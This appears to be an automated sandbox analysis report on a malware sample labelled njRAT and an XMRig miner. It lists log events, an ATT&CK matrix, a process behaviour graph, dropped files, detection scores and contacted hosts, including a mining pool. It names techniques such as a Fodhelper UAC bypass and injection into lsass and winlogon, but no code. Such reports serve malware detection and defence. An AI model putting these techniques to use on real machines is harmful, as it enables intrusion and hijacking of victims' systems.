        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,94_2_0000000140002300
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF6717C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FF6CF6717C0
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
        Source: dllhost.exeBinary or memory string: MsMpEng.exe
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts111
        Windows Management Instrumentation        		1
        Scripting        		2
        Abuse Elevation Control Mechanism        		11
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		11
        Input Capture        		1
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts22
        Command and Scripting Interpreter        		1
        Windows Service        		1
        Access Token Manipulation        		2
        Abuse Elevation Control Mechanism        		Security Account Manager125
        System Information Discovery        		SMB/Windows Admin Shares11
        Input Capture        		1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        Windows Service        		1
        Obfuscated Files or Information        		NTDS441
        Security Software Discovery        		Distributed Component Object ModelInput Capture1
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts1
        PowerShell        		31
        Registry Run Keys / Startup Folder        		912
        Process Injection        		1
        Software Packing        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
        Scheduled Task/Job        		1
        DLL Side-Loading        		Cached Domain Credentials231
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items31
        Registry Run Keys / Startup Folder        		1
        File Deletion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
        Rootkit        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Masquerading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Modify Registry        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd231
        Virtualization/Sandbox Evasion        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
        Access Token Manipulation        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers912
        Process Injection        		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
        Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job2
        Hidden Files and Directories        		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528504 Sample: e7WMhx18XN.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 163 pool.hashvault.pro 2->163 189 Sigma detected: Xmrig 2->189 191 Malicious sample detected (through community Yara rule) 2->191 193 Antivirus / Scanner detection for submitted sample 2->193 195 25 other signatures 2->195 14 e7WMhx18XN.exe 8 2->14         started        17 services64.exe 2->17         started        20 powershell.exe 2->20         started        22 10 other processes 2->22 signatures3 process4 file5 151 C:\Users\user\AppData\Local\Temp\paint.exe, PE32+ 14->151 dropped 153 C:\Users\user\...\FodhelperBypassUAC.exe, PE32+ 14->153 dropped 155 C:\Users\user\AppData\Local\Temp\b.bat, DOS 14->155 dropped 157 C:\Users\user\AppData\...\e7WMhx18XN.exe.log, CSV 14->157 dropped 24 cmd.exe 1 14->24         started        27 paint.exe 14->27         started        29 FodhelperBypassUAC.exe 2 14->29         started        169 Antivirus detection for dropped file 17->169 171 Machine Learning detection for dropped file 17->171 173 Writes to foreign memory regions 17->173 185 2 other signatures 17->185 31 conhost.exe 6 17->31         started        175 Modifies the context of a thread in another process (thread injection) 20->175 177 Injects a PE file into a foreign processes 20->177 34 dllhost.exe 20->34         started        36 conhost.exe 20->36         started        179 Suspicious powershell command line found 22->179 181 Query firmware table information (likely to detect VMs) 22->181 183 Changes security center settings (notifications, updates, antivirus, firewall) 22->183 38 dllhost.exe 22->38         started        40 powershell.exe 22->40         started        42 14 other processes 22->42 signatures6 process7 file8 201 Suspicious powershell command line found 24->201 219 2 other signatures 24->219 44 powershell.exe 24->44         started        58 4 other processes 24->58 203 Antivirus detection for dropped file 27->203 205 Machine Learning detection for dropped file 27->205 221 2 other signatures 27->221 48 conhost.exe 4 27->48         started        207 UAC bypass detected (Fodhelper) 29->207 50 cmd.exe 1 29->50         started        159 C:\Users\user\AppData\...\sihost64.exe, PE32+ 31->159 dropped 161 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 31->161 dropped 209 Found strings related to Crypto-Mining 31->209 211 Injects code into the Windows Explorer (explorer.exe) 31->211 213 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->213 223 2 other signatures 31->223 60 2 other processes 31->60 215 Contains functionality to inject code into remote processes 34->215 225 2 other signatures 34->225 52 winlogon.exe 34->52 injected 217 Creates a thread in another existing process (thread injection) 38->217 54 lsass.exe 38->54 injected 56 cmd.exe 40->56         started        63 3 other processes 42->63 signatures9 process10 dnsIp11 147 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 44->147 dropped 235 Sets debug register (to hijack the execution of another thread) 44->235 237 Modifies the context of a thread in another process (thread injection) 44->237 239 Suspicious command line found 44->239 241 Found suspicious powershell code related to unpacking or dynamic code loading 44->241 65 cmd.exe 44->65         started        149 C:\Users\user\AppData\...\services64.exe, PE32+ 48->149 dropped 68 cmd.exe 1 48->68         started        70 cmd.exe 1 48->70         started        72 fodhelper.exe 12 50->72         started        74 conhost.exe 50->74         started        80 3 other processes 56->80 243 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 58->243 165 pool.hashvault.pro 45.76.89.70, 54464, 80 AS-CHOOPAUS United States 60->165 245 Antivirus detection for dropped file 60->245 247 Query firmware table information (likely to detect VMs) 60->247 249 Machine Learning detection for dropped file 60->249 251 4 other signatures 60->251 76 conhost.exe 60->76         started        78 conhost.exe 63->78         started        82 5 other processes 63->82 file12 signatures13 process14 signatures15 187 Suspicious powershell command line found 65->187 84 powershell.exe 65->84         started        86 conhost.exe 65->86         started        88 cmd.exe 65->88         started        90 services64.exe 68->90         started        93 conhost.exe 68->93         started        95 conhost.exe 70->95         started        97 schtasks.exe 1 70->97         started        99 cmd.exe 1 72->99         started        process16 signatures17 101 cmd.exe 84->101         started        229 Writes to foreign memory regions 90->229 231 Allocates memory in foreign processes 90->231 233 Creates a thread in another existing process (thread injection) 90->233 104 conhost.exe 2 90->104         started        106 conhost.exe 99->106         started        process18 signatures19 197 Suspicious powershell command line found 101->197 199 Suspicious command line found 101->199 108 powershell.exe 101->108         started        112 conhost.exe 101->112         started        114 WMIC.exe 101->114         started        118 2 other processes 101->118 116 WerFault.exe 20 16 104->116         started        process20 dnsIp21 167 147.185.221.22, 54593, 54594, 54595 SALSGIVERUS United States 108->167 253 Creates autostart registry keys with suspicious values (likely registry only malware) 108->253 255 Creates autostart registry keys with suspicious names 108->255 257 Creates an autostart registry key pointing to binary in C:\Windows 108->257 259 5 other signatures 108->259 120 powershell.exe 108->120         started        123 powershell.exe 108->123         started        125 powershell.exe 108->125         started        127 2 other processes 108->127 signatures22 process23 signatures24 227 Injects a PE file into a foreign processes 120->227 129 conhost.exe 120->129         started        131 powershell.exe 120->131         started        133 conhost.exe 123->133         started        135 powershell.exe 123->135         started        137 conhost.exe 125->137         started        139 powershell.exe 125->139         started        141 conhost.exe 127->141         started        143 conhost.exe 127->143         started        145 powershell.exe 127->145         started        process25

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        e7WMhx18XN.exe53%ReversingLabsByteCode-MSIL.Backdoor.njRAT
        e7WMhx18XN.exe100%AviraTR/Dropper.Gen
        e7WMhx18XN.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraHEUR/AGEN.1344832
        C:\Users\user\AppData\Local\Temp\services64.exe100%AviraHEUR/AGEN.1344202
        C:\Users\user\AppData\Local\Temp\paint.exe100%AviraHEUR/AGEN.1344202
        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\services64.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\paint.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys5%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pool.hashvault.pro
        		45.76.89.70
        		truetrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
